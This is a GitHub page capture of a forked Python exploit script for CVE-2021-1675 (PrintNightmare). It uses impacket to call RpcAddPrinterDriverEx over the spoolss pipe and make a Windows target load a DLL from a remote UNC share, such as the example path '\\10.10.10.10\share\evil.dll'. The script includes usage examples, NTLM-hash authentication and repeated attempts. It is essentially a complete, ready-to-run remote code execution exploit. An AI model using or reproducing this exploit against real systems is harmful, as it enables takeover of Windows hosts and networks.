forked from cube0x0/CVE-2021-1675
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2021-1675.py
123 lines (101 loc) · 5.14 KB
/
CVE-2021-1675.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
#!/usr/bin/python3
from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5 import transport
import argparse
import sys
import time
def connect(username, password, domain, lmhash, nthash, address, port):
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
rpctransport = transport.DCERPCTransportFactory(binding)
rpctransport.set_dport(port)
rpctransport.setRemoteHost(address)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(username, password, domain, lmhash, nthash)
print("[*] Connecting to {0}".format(binding))
try:
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(rprn.MSRPC_UUID_RPRN)
except:
print("[-] Connection Failed")
sys.exit(1)
print("[+] Bind OK")
return dce
def main(username, password, domain, lmhash, nthash, address, port, share):
#connect
dce = connect(username, password, domain, lmhash, nthash, address, port)
#build DRIVER_CONTAINER package
container_info = rprn.DRIVER_CONTAINER()
container_info['Level'] = 2
container_info['DriverInfo']['tag'] = 2
container_info['DriverInfo']['Level2']['cVersion'] = 3
container_info['DriverInfo']['Level2']['pName'] = "1234\x00"
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00"
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
handle = "\\\\{0}\x00".format(address)
filename = share.split("\\")[-1]
print("[*] Uploading {0}".format(share))
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage0: {0}".format(resp['ErrorCode']))
for i in range(1, 50):
try:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
if (resp['ErrorCode'] == 0):
print("[+] Exploit Completed")
sys.exit()
except Exception as e:
#print(e)
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
Example;
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\\\192.168.1.215\\smb\\addCube.dll'
""")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group = parser.add_argument_group('connection')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
help='Destination port to connect to SMB Server')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None:
from getpass import getpass
password = getpass("Password:")
if options.hashes is not None:
lmhash, nthash = options.hashes.split(':')
else:
lmhash = ''
nthash = ''
#re-run if stage0/stageX fails
print("[*] Try 1...")
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
time.sleep(10)
print("[*] Try 2...")
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
time.sleep(10)
print("[*] Try 3...")
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)